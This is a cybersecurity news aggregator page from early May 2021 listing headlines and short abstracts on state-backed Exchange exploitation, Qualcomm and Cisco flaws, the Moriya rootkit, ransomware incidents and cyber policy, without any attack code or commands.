Hillicon Valley: US, UK authorities say Russian hackers exploited Microsoft vulnerabilities | Lawmakers push for more cyber funds in annual appropriations | Google child care workers ask for transportation stipend Full Text

Abstract American and British authorities said Friday that Russian state-sponsored hackers exploited major vulnerabilities in Microsoft’s Exchange Server, which were previously used by at least one Chinese state-sponsored hacking group to compromise potentially thousands of organizations. Meanwhile, lawmakers on both sides of the aisle are pushing hard for more cyber funding in the annual appropriations bills, and Google child care workers are pushing for a transportation stipend from the company. 

The Hill

May 07, 2021 – Government

Lawmakers push for increased cybersecurity funds in annual appropriations Full Text

Abstract Lawmakers are increasingly pushing for Congress to increase funding in numerous areas to boost the nation’s cybersecurity, particularly after multiple major breaches and a year in which hackers have increasingly targeted critical infrastructure. 

The Hill

May 7, 2021 – Business

Beware the gold rush: The risk of a cyber investment surge Full Text

Abstract Crises begets demand which begets a terrific business opportunity.

SCMagazine

May 7, 2021 – APT

Russia-linked APT29 group changes TTPs following April advisories Full Text

Abstract The UK and US cybersecurity agencies have published a report detailing techniques used by Russia-linked cyberespionage group known APT29 (aka Cozy Bear). Today, UK NCSC and CISA-FBI-NSA cybersecurity agencies published a joint security advisory that...

Security Affairs

May 07, 2021 – Attack

Microsoft: Business email compromise attack targeted dozens of orgs Full Text

Abstract Microsoft detected a large-scale business email compromise (BEC) campaign that targeted more than 120 organization using typo-squatted domains registered days before the attacks began.

BleepingComputer

May 7, 2021 – General

Security researchers applaud Google’s move towards multi-factor authentication Full Text

Abstract Google took an important step on Thursday by saying that “very soon” they will automatically enroll users what they are calling two-step verification (2SV) – a move security researchers say is a step in the right direction.

SCMagazine

May 07, 2021 – Insider Threat

Bulletproof hosting admins plead guilty to running cybercrime safe haven Full Text

Abstract Four individuals from Eastern Europe are facing 20 years in prison for Racketeer Influenced Corrupt Organization (RICO) charges after pleading guilty to running a bulletproof hosting service as a safe haven for cybercrime operations targeting US entities.

BleepingComputer

May 07, 2021 – Hacker

US, UK authorities say Russian state-sponsored hackers exploited Microsoft vulnerabilities Full Text

Abstract Russian state-sponsored hackers were among those to exploit recently uncovered vulnerabilities in Microsoft’s Exchange Server email application, which potentially compromised thousands of organizations, a coalition of American and British federal agencies warned Friday.

The Hill

May 7, 2021 – Malware

Panda Stealer: Spreading via Spam Emails and Discord Full Text

Abstract Panda Stealer, a new cryptocurrency variant, has been found spreading through a global spam campaign and potentially through Discord channels. It is targeting individuals across U.S., Australia, Japan, and Germany.

Cyware Alerts - Hacker News

May 7, 2021 – Malware

Buer malware rewritten in Rust language to curb detection Full Text

Abstract Researchers said that the last few years saw malware authors adopting newer coding languages at a more rapid pace.

SCMagazine

May 7, 2021 – Phishing

Three Marylanders Indicted Over BEC Scam Full Text

Abstract Defendants charged in connection with dating and BEC scams that netted over $2.3m

Infosecurity Magazine

May 07, 2021 – Vulnerabilities

Foxit Reader bug lets attackers run malicious code via PDFs Full Text

Abstract Foxit Software, the company behind the highly popular Foxit Reader, has published security updates to fix a high severity remote code execution (RCE) vulnerability affecting the PDF reader.

BleepingComputer

May 7, 2021 – Hacker

Hacking the Hackers, OGUsers Hacked Again Full Text

Abstract OGUsers has been hacked for the fourth time in two years. The hacking forum’s database consisting of private messages and user records for almost 350,000 members is on sale now for $3,000.

Cyware Alerts - Hacker News

May 7, 2021 – Breach

US Physics Laboratory Exposed Documents, Credentials Full Text

Abstract The Fermilab has tidied up its systems after security researchers found weaknesses exposing documents, proprietary applications, personal information, project details, and credentials.

Gov Info Security

May 7, 2021 – General

Work from Home, Cyberattacks, and Financial Organizations: An Undesirable Trend Full Text

Abstract Insurers and banks witnessed a rise in botnet, phishing, and ransomware attacks by 35%; mobile malware by 32%; COVID-related malware by 30%; and insider threats by 29%, according to a new report.

Cyware Alerts - Hacker News

May 7, 2021 – Vulnerabilities

A Dangerously Bad macOS Bug and a Malware Campaign Full Text

Abstract A dangerously bad zero-day vulnerability in macOS was being abused by the Shlayer malware to bypass Apple’s Gatekeeper, Notarization, and File Quarantine security checks.

Cyware Alerts - Hacker News

May 7, 2021 – Business

Forcepoint Buys Remote Browser Isolation Startup Cyberinc Full Text

Abstract Forcepoint has purchased emerging remote browser isolation vendor Cyberinc to give administrators granular controls that allow them to minimize risk without impeding user productivity.

CRN

May 7, 2021 – Breach

19 petabytes of data exposed across 29,000+ unprotected databases Full Text

Abstract Researchers found that over 29,000 databases worldwide are still completely unprotected and publicly accessible, leaving close to 19,000 terabytes of data exposed to anyone, including threat actors.

Cyber News

May 7, 2021 – Government

DHS to hire 200 more cyber pros as Biden administration grapples with hacking threats Full Text

Abstract In a speech Wednesday, Homeland Security Secretary Alejandro Mayorkas said the cyber recruiting was part of “the most significant hiring initiative” that DHS has undertaken in its 18-year history.

Cyberscoop

May 7, 2021 – Policy and Law

Lawsuit Filed Over Contact Tracing Data Breach Full Text

Abstract State of Pennsylvania and Insight Global accused of cybersecurity failures after PHI exposed

Infosecurity Magazine

May 7, 2021 – Botnet

Bot Attacks a Top Cybersecurity Concern Full Text

Abstract Majority of security leaders view bot mitigation as a top priority

Infosecurity Magazine

May 7, 2021 – Vulnerabilities

Intel, AMD Dispute Findings on Chip Vulnerabilities Full Text

Abstract Intel and AMD insist that users of their chips do not need to take any additional security measures as a result of the discovery because existing protections are adequate.

Gov Info Security

May 7, 2021 – Breach

19 petabytes of data exposed across 29,000+ unprotected databases Full Text

Abstract CyberNews researchers found more than 29,000 unprotected databases worldwide that are still publicly accessible, leaving close to 19,000 terabytes of data exposed to anyone, including threat actors. Most organizations use databases to store sensitive...

Security Affairs

May 7, 2021 – Breach

ShinyHunters leak database of Indian wedding portal WedMeGood Full Text

Abstract It is worth noting that apparently, WedMeGood suffered a data breach back in October 2020 when a threat actor published a list of several compromised sites and offered their database for price.

Hackread

May 07, 2021 – Privacy

4 Major Privacy and Security Updates From Google You Should Know About Full Text

Abstract Google has announced a number of user-facing and under-the-hood changes in an attempt to boost privacy and security, including rolling out two-factor authentication automatically to all eligible users and bringing iOS-styled privacy labels to Android app listings. "Today we ask people who have enrolled in  two-step verification  (2SV) to confirm it's really them with a simple tap via a Google prompt on their phone whenever they sign in," the company  said . "Soon we'll start automatically enrolling users in 2SV if their accounts are appropriately configured." Google Play To Get Apple-Like Privacy Labels The Google Play Store for Android is also getting a huge overhaul on the privacy front. The search giant said it plans to include a new  safety section  for app listings that highlights the type of data is collected and stored — such as approximate or precise location, contacts, personal information, photos and videos, and audio files — and how the data i

The Hacker News

May 07, 2021 – Hacker

Russian state hackers switch targets after US joint advisories Full Text

Abstract Russian Foreign Intelligence Service (SVR) operators have switched their attacks to target new vulnerabilities in reaction to US govt advisories published last month with info on SVR tactics, tools, techniques, and capabilities used in ongoing attacks.

BleepingComputer

May 7, 2021 – Ransomware

US defense contractor BlueForce apparently hit by ransomware Full Text

Abstract The Conti ransomware operators demanded nearly $1 million in bitcoin during ransomware negotiations and threatened to publish the defense contractor's data on its leak site.

Tech Target

May 7, 2021 – General

80% of Net Neutrality Comments to FCC Were Fudged Full Text

Abstract NY’s AG: Millions of fake comments – in favor and against – came from a secret broadband-funded campaign or from a 19-year-old’s fake identities.

Threatpost

May 7, 2021 – Policy and Law

Israel’s Version of Moving Fast and Breaking Things: The New Cybersecurity Bill Full Text

Abstract If a new law is passed by government committee and the Knesset, it will redefine cybersecurity governance in Israel.

Lawfare

May 7, 2021 – General

NCSC Sets Out Security Principles for Smart Cities Full Text

Abstract The guidance is designed to help local authorities in the UK build secure smart cities

Infosecurity Magazine

May 7, 2021 – General

[Full-Disclosure] HideezKey 2 FAIL: How a good idea turns into a SPF (Security Product Failure) Full Text

Abstract HideezKey- This is a deep-dive into a nice concept for a security token & password manager that turned into a horrible product due to lack of proper R&D and Threat Modeling. Prologue: After my first success in bypassing APPROTECT readout...

Security Affairs

May 07, 2021 – Vulnerabilities

6 Unpatched Flaws Disclosed in Remote Mouse App for Android and iOS Full Text

Abstract As many as six zero-days have been uncovered in an application called Remote Mouse, allowing a remote attacker to achieve full code execution without any user interaction. The unpatched flaws, collectively named ' Mouse Trap, ' were disclosed on Wednesday by security researcher Axel Persinger, who said, "It's clear that this application is very vulnerable and puts users at risk with bad authentication mechanisms, lack of encryption, and poor default configuration." Remote Mouse is a remote control application for Android and iOS that turns mobile phones and tablets into a wireless mouse, keyboard, and trackpad for computers, with support for voice typing, adjusting computer volume, and switching between applications with the help of a Remote Mouse server installed on the machine. The Android app alone has been installed over 10 million times. In a nutshell, the issues, which were identified by analysing the packets sent from the Android app to its Windows ser

The Hacker News

May 07, 2021 – Privacy

Twitter Tip Jar may expose PayPal address, sparks privacy concerns Full Text

Abstract This week Twitter has begun experimenting with a new feature called 'Tip Jar,' which lets Twitter users tip select profiles to support their work.. But the feature has sparked multiple concerns among Twitter users: from the sender's PayPal shipping address getting exposed, to how are disputes handled.

BleepingComputer

May 7, 2021 – Vulnerabilities

VMware addresses critical RCE in vRealize Business for Cloud Full Text

Abstract VMware has fixed a new critical RCE flaw in VMware vRealize Business for Cloud that was reported by sanctioned Russian firm Positive Technologies. VMware has addressed a critical remote code execution vulnerability, tracked as CVE-2021-21984, in VMware...

Security Affairs

May 7, 2021 – Malware

New Moriya Rootkit Used in the Wild to Backdoor Windows Systems Full Text

Abstract Moriya rootkit is used by an unknown actor to deploy passive backdoors on public-facing servers, facilitating the creation of a covert C2 communication channel through which they can be controlled.

Kaspersky Labs

May 07, 2021 – General

Data leak marketplaces aim to take over the extortion economy Full Text

Abstract Cybercriminals are embracing data-theft extortion by creating dark web marketplaces that exist solely to sell stolen data.

BleepingComputer

May 7, 2021 – Vulnerabilities

New Techniques Emerge for Abusing Windows Services to Gain System Control Full Text

Abstract Several new techniques have become available recently that give attackers an easy way to abuse legitimate Windows services and escalate low-level privileges on a system to gain full control of it.

Dark Reading

May 7, 2021 – Government

CISA used new subpoena power to contact US companies vulnerable to hacking Full Text

Abstract The CISA used a new subpoena power for the first time last week to contact at least one U.S. internet service provider with customers whose software is vulnerable to hacking.

Cyberscoop

May 7, 2021 – Vulnerabilities

Millions of Older Broadband Routers Plagued by Security Flaws, Warn Researchers Full Text

Abstract Millions of households in the UK are using old broadband routers that could fall prey to hackers, according to a new investigation carried out by consumer watchdog Which?.

ZDNet

May 07, 2021 – Vulnerabilities

New tsuNAME Flaw Could Let Attackers Take Down Authoritative DNS Servers Full Text

Abstract Security researchers Thursday disclosed a new critical vulnerability affecting Domain Name System (DNS) resolvers that could be exploited by adversaries to carry out denial-of-service attacks against authoritative nameservers. The flaw, called  'TsuNAME ,' was discovered by researchers from SIDN Labs and InternetNZ, which manage the national top-level internet domains '.nl' and '.nz' for the Netherlands and New Zealand, respectively. "TsuNAME occurs when domain names are misconfigured with cyclic dependent DNS records, and when vulnerable resolvers access these misconfigurations, they begin looping and send DNS queries rapidly to authoritative servers and other resolvers," the researchers said. A recursive DNS resolver is one of the core components involved in  DNS resolution , i.e., converting a hostname such as www.google.com into a computer-friendly IP address like 142.250.71.36. To achieve this, it responds to a client's request for a web

The Hacker News

May 7, 2021 – Ransomware

CISA Warns of Attacks Using FiveHands Ransomware and SombRAT Full Text

Abstract The Cybersecurity and Infrastructure Security Agency (CISA) is aware of a recent successful cyberattack against an organization using a new ransomware variant, which CISA refers to as FiveHands.

ICSA

May 7, 2021 – Vulnerabilities

Millions of Households at Risk from Outdated Routers Full Text

Abstract Which report warns many lack regular firmware updates

Infosecurity Magazine

May 7, 2021 – Ransomware

#COVID19 Researchers Lose a Week’s Work to Ryuk Ransomware Full Text

Abstract Sophos traces attack back to a stolen password

Infosecurity Magazine

May 7, 2021 – Ransomware

Connecting the Bots – Hancitor fuels Cuba Ransomware Operations Full Text

Abstract The Cuba Ransomware gang has partnered with the crooks behind the Hancitor malware in attacks aimed at corporate networks. The Hancitor downloader has been around for quite some time already. It is known since at least 2016 for dropping...

Security Affairs

May 7, 2021 – Breach

Misconfigured Database Exposes 200K Fake Amazon Reviewers Full Text

Abstract Mass scheme designed to trick e-commerce customers

Infosecurity Magazine

May 7, 2021 – Malware

Researchers use PyInstaller to create stealth malware Full Text

Abstract Instead of obfuscating code and creating an untraceable malware packer from scratch, cybercriminals could take advantage of PyInstaller to create packers that are not caught in scans.

Tech Target

May 07, 2021 – Ransomware

Cuba Ransomware partners with Hancitor for spam-fueled attacks Full Text

Abstract The Cuba Ransomware gang has teamed up with the spam operators of the Hancitor malware to gain easier access to compromised corporate networks.

BleepingComputer

May 07, 2021 – Malware

New Stealthy Rootkit Infiltrated Networks of High-Profile Organizations Full Text

Abstract An unknown threat actor with the capabilities to evolve and tailor its toolset to target environments infiltrated high-profile organizations in Asia and Africa with an evasive Windows rootkit since at least 2018. Called  'Moriya ,' the malware is a "passive backdoor which allows attackers to inspect all incoming traffic to the infected machine, filter out packets that are marked as designated for the malware and respond to them," said Kaspersky researchers Mark Lechtik and Giampaolo Dedola in a Thursday deep-dive. The Russian cybersecurity firm termed the ongoing espionage campaign  'TunnelSnake .' Based on telemetry analysis, less than 10 victims around the world have been targeted to date, with the most prominent victims being two large diplomatic entities in Southeast Asia and Africa. All the other victims were located in South Asia. The first reports of Moriya emerged last November when Kaspersky said it discovered the stealthy implant in the networks

The Hacker News

May 7, 2021 – Ransomware

DHS Secretary: Small Businesses Hard-Hit by Ransomware Full Text

Abstract "The losses from ransomware are staggering. And the pace at which those losses are being realized is equally staggering," Mayorkas said, noting this is why DHS has made battling ransomware a priority.

Bank Info Security

May 7, 2021 – Phishing

Amazon Fake Reviews Scam Exposed in Data Breach Full Text

Abstract In total, 13,124,962 of records (or 7GB of data) have been exposed in the breach, potentially implicating more than 200,000 people in unethical activities like giving fake product reviews on Amazon.

Safety Detectives

May 7, 2021 – Attack

Possible attacks on the TCP/IP protocol stack and countermeasures Full Text

Abstract Let’s look at what types of threats each layer of the TCP/IP protocol stack may be susceptible to. The task of a computer security system is to safeguard the information transmitted over the network and to adequately preserve the data stored in it.  Excluding...

Security Affairs

May 7, 2021 – General

60% of U.S. School Mobile Apps Disclose Collected Data Without Permission Full Text

Abstract According to the results of the study conducted by Me2B Alliance, 60% of school apps are sending student data to various third parties, including ad networks like Google and Facebook.

Softpedia

May 06, 2021 – Solution

Google wants to enable multi-factor authentication by default Full Text

Abstract Google strives to push all its users to start using two-factor authentication (2FA), which can block attackers from taking control of their accounts using compromised credentials or guessing their passwords.

BleepingComputer

May 6, 2021 – Malware

Pingback Malware Using ICMP for Covert Communication Full Text

Abstract A new Windows malware called Pingback has been found using DLL hijacking attack to target Microsoft Windows 64-bit systems. The malware takes the advantage of ICMP for its command-and-control activities.

Cyware Alerts - Hacker News

May 06, 2021 – General

Hillicon Valley: Broadband companies funded fake net neutrality comments, investigation finds | Twitter rolls out tip feature | Google to adopt ‘hybrid work week’ Full Text

Abstract New York Attorney General Letitia James (D) on Thursday released findings that American broadband companies had funded a campaign to file millions of fake comments with federal authorities around net neutrality. Meanwhile, Twitter announced a new feature to allow users to send and receive tips, while Google detailed its proposal for how employees will work in a post-COVID-19 world. 

The Hill

May 6, 2021 – Policy and Law

“Unusually Unhinged” Cyber-stalker Jailed for 10 Years Full Text

Abstract Man stalked ex-wife and kids from New Mexico to Oregon despite protective order

Infosecurity Magazine

May 6, 2021 – Attack

Windows Moriya rootkit used in highly targeted attacks Full Text

Abstract Experts spotted a new malware, dubbed Moriya rootkit, that targets Windows systems as part of cyberespionage campaign dubbed TunnelSnake. An unclassified threat actor employed a new stealthy malware, dubbed Moriya rootkit, to compromise Windows systems....

Security Affairs

May 6, 2021 – Phishing

Financial sector saw a 125% increase in mobile phishing attacks during 2020 Full Text

Abstract Average quarterly exposure to phishing attacks on mobile devices in the financial sector rose by 125% – and malware and app risk exposure increased by more than five times.

SCMagazine

May 6, 2021 – Vulnerabilities

Qualcomm Chip Bug Opens Android Fans to Eavesdropping Full Text

Abstract A malicious app can exploit the issue, which could affect up to 30 percent of Android phones.

Threatpost

May 06, 2021 – Vulnerabilities

New TsuNAME DNS bug allows attackers to DDoS authoritative DNS servers Full Text

Abstract Attackers can use a newly disclosed domain name server (DNS) vulnerability publicly known as TsuNAME as an amplification vector in large-scale reflection-based distributed denial of service (DDoS) attacks targeting authoritative DNS servers.

BleepingComputer

May 6, 2021 – Malware

Buer Downloader: Now Using Rust to Hide Itself Full Text

Abstract A new malicious campaign, masquerading as shipping notices from DHL, was found deploying the latest Buer malware loader variant written in Rust. The new update in Buer helps attackers evade detection and increase successful click rates.

Cyware Alerts - Hacker News

May 06, 2021 – Breach

Peloton user data exposed by newly patched vulnerabilities Full Text

Abstract Recently patched vulnerabilities in Peloton’s bike software may have allowed unauthorized users to view sensitive user data, new security research published this week found.

The Hill

May 6, 2021 – Breach

CaptureRx Data Breach Impacts Healthcare Providers Full Text

Abstract US healthcare providers affected by cyber-attack on third-party administrative services vendor

Infosecurity Magazine

May 6, 2021 – Vulnerabilities

Qualcomm bug impacts about 30% of all smartphones Full Text

Abstract A high severity flaw, tracked as CVE-2020-11292, affects Qualcomm Mobile Station Modem chips used by around 30% of all smartphones worldwide Researchers from Checkpoint have discovered a buffer overflow vulnerability, tracked as CVE-2020-11292, in the Qualcomm...

Security Affairs

May 6, 2021 – General

Here’s the breakdown of cybersecurity stats only law firms usually see Full Text

Abstract BakerHostetler, a law firm with a massive data and privacy presence, compiles data from their client’s experiences to offer a rare lawyer’s perspective on cyber statistics. SC spoke to Craig Hoffman, partner at BakerHostetler and the main editor of the report, about the real outcomes from breaches.

SCMagazine

May 06, 2021 – Ransomware

A student pirating software led to a full-blown Ryuk ransomware attack Full Text

Abstract A student's attempt to pirate an expensive data visualization software led to a full-blown Ryuk ransomware attack at a European biomolecular research institute.

BleepingComputer

May 6, 2021 – Vulnerabilities

Flaw in PHP Composer Could Allow Supply-Chain Attacks Full Text

Abstract Security threats in PHP or its components can have a big impact. Lately, a vulnerability was found in the PHP Composer that could have allowed an attacker to execute arbitrary commands and backdoor every PHP package.

Cyware Alerts - Hacker News

May 6, 2021 – Government

DOD Expands Hacker Program Full Text

Abstract Ethical hackers can now hunt bugs in all US publicly accessible defense information systems

Infosecurity Magazine

May 6, 2021 – General

The business of cyber: How security defines (or derails) success Full Text

Abstract Is cyber a hurdle to success, or might it be an enabler? In this SC Awards Winners Circle roundtable, cybersecurity leaders, and award recipients, share how organizations can shift the mindset and understand how a culture of security just may be good for business.

SCMagazine

May 6, 2021 – APT

Chinese APT Groups Targeting Russian Defense Contractors Full Text

Abstract Hackers infiltrated the systems of Rubin Central Design Bureau for Marine Engineering, a Russian submarine design firm, using a new malware called PortDoor. It is suspected that Chinese actors could be behind the attack.

Cyware Alerts - Hacker News

May 6, 2021 – Vulnerabilities

Vulnerability in Qualcomm chips lets an attacker snoop on calls and texts Full Text

Abstract Checkpoint researchers shed further light this week on a vulnerability affecting a cellular chip embedded in 40% of the world’s smartphones.

SCMagazine

May 6, 2021 – Hacker

REvil REvil - The Cyber Devil Full Text

Abstract REvil is a fierce threat with its smart hacking tactics and techniques. The ransomware now spreads via exploit kits, RDP servers, backdoored software installers, and scan-and-exploit methods. Apply adequate security measures to stay protected.

Cyware Alerts - Hacker News

May 6, 2021 – Business

SolarWinds hires CISO from within, enabling a quicker security transformation Full Text

Abstract Tim Brown’s familiarity with the internal environment and attack investigation potentially means less time to ramp up company’s Secure by Design initiative. But there could be some drawbacks to hiring from within as well.

SCMagazine

May 6, 2021 – Malware

Roaming Mantis Amplifies Smishing Campaign with OS-Specific Android Malware | McAfee Blogs Full Text

Abstract Since January 2021, Roaming Mantis has been targeting Japanese users with a new malware called SmsSpy. The malicious code infects Android users using one of two variants based on the version of OS.

McAfee

May 6, 2021 – Botnet

A taste of the latest release of QakBot Full Text

Abstract The infection chain starts with an URL in the email body that downloads a zip archive containing an Excel file that uses XLM 4.0 macros to download the 2nd stage from the compromised web servers.

Security Affairs

May 6, 2021 – Business

MDR Firm Huntress Raises $40 Million in Series B Funding Round Full Text

Abstract The Series B round, led by JMI Equity, will help the company expand its platform. Previous investors ForgePoint Capital and Gula Tech Adventures also participated in the latest financing round.

Security Week

May 6, 2021 – Government

Chinese military unit accused of cyber-espionage bought multiple western antivirus products Full Text

Abstract According to multiple documents found by Recorded Future’s Insikt Group, Unit 61419 of the Chinese People’s Liberation Army (PLA) bought small batches of different antivirus products in early 2019.

The Record

May 06, 2021 – Malware

New Moriya rootkit used in the wild to backdoor Windows systems Full Text

Abstract A new stealthy rootkit was used by an unknown threat actor to backdoor targeted Windows systems in a likely ongoing espionage campaign dubbed TunnelSnake and going back to at least 2018.

BleepingComputer

May 6, 2021 – Ransomware

Update: REvil ransomware to blame for UnitingCare Queensland’s April attack Full Text

Abstract The organization, which provides aged care, disability supports, health care, and crisis response services throughout the Australian state, suffered the attack on Sunday, 25 April 2021.

ZDNet

May 06, 2021 – General

CISO Challenge: Check Your Cybersecurity Skills On This New Competition Site Full Text

Abstract InfoSec leaders tend to be a specific type. Their jobs require them to think of possible threats, take actions that may not pay immediate results, plan for unknown security risks, and react quickly when emergencies arise, often before the morning's first coffee. The high-stakes position also means that CISOs need to keep their knowledge and skills sharp – you can never really know what's around the corner. So, what can security leaders do to make sure they're prepared and hone their skills ahead of the next inevitable threat? Now, they can test themselves and their knowledge at a new website, 'The CISO Challenge' ( visit it here ). The website, launched by XDR provider Cynet, aims to let information security leaders test their cybersecurity mettle. The website features a challenge for InfoSec leaders (and those who are looking to become one) to test their knowledge in an exciting, high-stakes, realistic series of scenarios. The challenge consists of 25 scenario

The Hacker News

May 6, 2021 – Phishing

Financial Services Experience 125% Rise in Exposure to Mobile Phishing Full Text

Abstract Cyber-criminals have ramped up their targeting of phones, tablets, and Chromebooks

Infosecurity Magazine

May 6, 2021 – APT

Chinese PLA Unit 61419 suspected to have purchased AVs for cyber-espionage Full Text

Abstract Chinese military unit PLA Unit 61419 is suspected to be involved in cyber-espionage campaigns against multiple antivirus companies. Researchers from cybersecurity firm Recorded Future’s Insikt Group have discovered six procurement documents from...

Security Affairs

May 06, 2021 – Vulnerabilities

Qualcomm vulnerability impacts nearly 40% of all mobile phones Full Text

Abstract A high severity security vulnerability found in Qualcomm's Mobile Station Modem (MSM) chips (including the latest 5G-capable versions) could enable attackers to access mobile phone users' text messages, call history, and listen in on their conversations.

BleepingComputer

May 6, 2021 – Breach

Faxton St. Luke’s Healthcare vendor faces data breach; potentially exposing information on thousands of patients Full Text

Abstract Faxton St. Luke’s Healthcare (FSLH) was notified on March 30, 2021, that Capture RX, a third-party business associate, experienced a data breach on February 6, 2021, affecting 17,655 patients of FSLH.

WKTV

May 06, 2021 – Vulnerabilities

Critical Flaws Hit Cisco SD-WAN vManage and HyperFlex Software Full Text

Abstract Networking equipment major Cisco has rolled out software updates to address multiple critical vulnerabilities impacting HyperFlex HX and SD-WAN vManage Software that could allow an attacker to perform command injection attacks, execute arbitrary code, and gain access to sensitive information. In a series of advisories published on May 5, the company said there are no workarounds that remediate the issues. The HyperFlex HX command injection vulnerabilities, tracked as CVE-2021-1497 and CVE-2021-1498 (CVSS scores 9.8), affect all Cisco devices running HyperFlex HX software versions 4.0, 4.5, and those prior to 4.0. Arising due to insufficient validation of user-supplied input in the web-based management interface of Cisco HyperFlex HX Data Platform, the flaws could enable an unauthenticated, remote attacker to perform a command injection attack against a vulnerable device. "An attacker could exploit this vulnerability by sending a crafted request to the web-based management int

The Hacker News

May 6, 2021 – General

Financial Firms Report Puzzling 30% Drop in Breaches as Incidents Rise Full Text

Abstract Sector takes more robust approach to GDPR reporting

Infosecurity Magazine

May 6, 2021 – Botnet

A taste of the latest release of QakBot Full Text

Abstract A taste of the latest release of QakBot – one of the most popular and mediatic trojan bankers active since 2007. The malware QakBot, also known as Qbot, Pinkslipbot, and Quakbot is a banking trojan that has been made headlines since 2007. This...

Security Affairs

May 6, 2021 – General

Google Chrome adopts Windows 10 security feature Full Text

Abstract To protect the memory stack from cyberattackers, Google revealed that its Chrome 90 has adopted a new Windows 10 security feature called "Hardware-enforced Stack Protection".

The Times Of India

May 06, 2021 – Vulnerabilities

New Qualcomm Chip Bug Could Let Hackers Spy On Android Devices Full Text

Abstract Cybersecurity researchers have disclosed a new security vulnerability in Qualcomm's mobile station modems (MSM) that could potentially allow an attacker to leverage the underlying Android operating system to slip malicious code into mobile phones, undetected. "If exploited, the vulnerability would have allowed an attacker to use Android OS itself as an entry point to inject malicious and invisible code into phones, granting them access to SMS messages and audio of phone conversations," researchers from Israeli security firm Check Point  said  in an analysis published today. The heap overflow vulnerability, tracked as CVE-2020-11292 , resides in the QMI voice service API exposed by the modem to the high level operating system, and could be exploited by a malicious app to conceal its activities "underneath" the OS in the modem chip itself, thus making it invisible to the security protections built into the device. Designed since the 1990s, Qualcomm  MSM  chip

The Hacker News

May 6, 2021 – Vulnerabilities

Researcher Claims Peloton APIs Exposed All Users Data Full Text

Abstract Even those in privacy mode were affected, says Pen Test Partners

Infosecurity Magazine

May 6, 2021 – Vulnerabilities

Cisco fixes critical flaws in SD-WAN vManage and HyperFlex HX software Full Text

Abstract Cisco fixed critical flaws in SD-WAN vManage and HyperFlex HX software that could allow creating admin accounts, and executing commands as root. Cisco has addressed critical vulnerabilities affecting SD-WAN vManage and HyperFlex HX software that could...

Security Affairs

May 6, 2021 – Vulnerabilities

JET engine flaws can crash Microsoft’s IIS, SQL Server, say Palo Alto researchers Full Text

Abstract Researchers at Palo Alto Networks have detailed vulnerabilities in the JET database engine that can be exploited to execute malicious code on systems running Microsoft’s SQL Server and IIS web server.

The Register

May 06, 2021 – Vulnerabilities

New Spectre Flaws in Intel and AMD CPUs Affect Billions of Computers Full Text

Abstract When Spectre, a class of critical vulnerabilities impacting modern processors, was  publicly revealed  in January 2018, the researchers behind the discovery  said , "As it is not easy to fix, it will haunt us for quite some time," explaining the inspiration behind naming the speculative execution attacks. Indeed, it's been more than three years, and there is no end to Spectre in sight. A team of academics from the University of Virginia and University of California, San Diego, have discovered a  new line of attack  that bypasses all current Spectre protections built into the chips, potentially putting almost every system — desktops, laptops, cloud servers, and smartphones — once again at risk just as they were three years ago. The disclosure of  Spectre and Meltdown  opened a  floodgates  of sorts, what with  endless   variants  of the  attacks  coming to light in the intervening years, even as chipmakers like Intel, ARM, and AMD have continually scrambled to incorpo

The Hacker News

May 6, 2021 – General

Half of UK Manufacturers Suffered a Cyber-Attack Last Year Full Text

Abstract Make UK study shows more work is needed

Infosecurity Magazine

May 6, 2021 – Ransomware

Cyberattackers Behind Avaddon Ransomware Give Australia’s NSW Labor 240 Hours to Pay Ransom Full Text

Abstract Avaddon, which originated in Russia, is behind the breach and is threatening to release a trove of sensitive information including images of passports, driver’s licenses, and employment contracts.

Sydney Morning Herald

May 6, 2021 – Vulnerabilities

Malicious Office 365 Apps Are the Ultimate Insiders – Krebs on Security Full Text

Abstract These attacks begin with an emailed link that when clicked loads not a phishing site but the user’s actual Office 365 login page — whether that be at microsoft.com or their employer’s domain.

Krebs on Security

May 6, 2021 – Breach

East London Council Accidentally Exposes Thousands of Residents’ Email Addresses Full Text

Abstract A local authority in East London has committed a privacy blunder by emailing what appear to be thousands of residents – while forgetting to use the BCC field and exposing all of the email addresses.

The Register

May 6, 2021 – Malware

RaccoonStealer Malware Group Leaves Millions of Stolen Authentication Cookies Exposed in Unsecured Server Full Text

Abstract This type of malware infects devices and then collects user credentials from web browsers, FTP, and email clients, data that is later uploaded to command and control (C&C) servers.

The Record

May 5, 2021 – Phishing

BazarBackdoor phishing campaign eschews links and files to avoid raising red flags Full Text

Abstract SEGs and sandbox rules are designed to spot them, and employees are trained to distrust them, so attackers are taking an alternate approach.

SCMagazine

May 5, 2021 – Phishing

Feds Shut Down Fake COVID-19 Vaccine Phishing Website Full Text

Abstract ‘Freevaccinecovax.org’ claimed to be that of a biotech company but instead was stealing info from visitors to use for nefarious purposes.

Threatpost

May 5, 2021 – Malware

180+ OAuth 2.0 cloud malware apps detected Full Text

Abstract Cloud malware can be used to conduct reconnaissance, launch employee-to-employee attacks, and steal files and emails from cloud platforms.

SCMagazine

May 05, 2021 – Vulnerabilities

Cisco bugs allow creating admin accounts, executing commands as root Full Text

Abstract Cisco has fixed critical SD-WAN vManage and HyperFlex HX software security flaws that could enable remote attackers to execute commands as root or create rogue admin accounts.

BleepingComputer

May 5, 2021 – Policy and Law

IP or just generic tech? Palo Alto argues Centripetal patent claims are overly broad Full Text

Abstract The company claims a lawsuit filed against them by Centripetal Networks involve basic network security techniques and should be dismissed.

SCMagazine

May 05, 2021 – Vulnerabilities

VMware fixes critical RCE bug in vRealize Business for Cloud Full Text

Abstract VMware has released security updates to address a critical severity vulnerability in vRealize Business for Cloud that enables unauthenticated attackers to remotely execute malicious code on vulnerable servers.

BleepingComputer

May 5, 2021 – Criminals

UNC2529, a new sophisticated cybercrime gang that targets U.S. orgs with 3 malware Full Text

Abstract A new cybercrime gang, tracked as UNC2529, has targeted many organizations in the US and other countries using new sophisticated malware. A new financially motivated threat actor, tracked by FireEye Experts as UNC2529, has targeted many organizations...

Security Affairs

May 5, 2021 – Hacker

Homecoming Queen Hacker to be Tried as an Adult Full Text

Abstract Florida teen accused of hacking students’ accounts to rig homecoming contest to face felony charges as an adult

Infosecurity Magazine

May 5, 2021 – Malware

Panda Stealer Targets Crypto Wallets Full Text

Abstract Crypto wallets and Discord credentials among targets of new information stealer

Infosecurity Magazine

May 5, 2021 – General

Poor Working Relationships Between Security and Networking Teams Preventing Benefits of Digital Transformation Full Text

Abstract Nearly half of IT pros described a negative relationship between security and networking teams

Infosecurity Magazine

May 5, 2021 – Attack

Cyber-Attack on Belgian Parliament Full Text

Abstract Belgium’s parliament, universities, and police targeted in a coordinated DDoS attack

Infosecurity Magazine

May 5, 2021 – Government

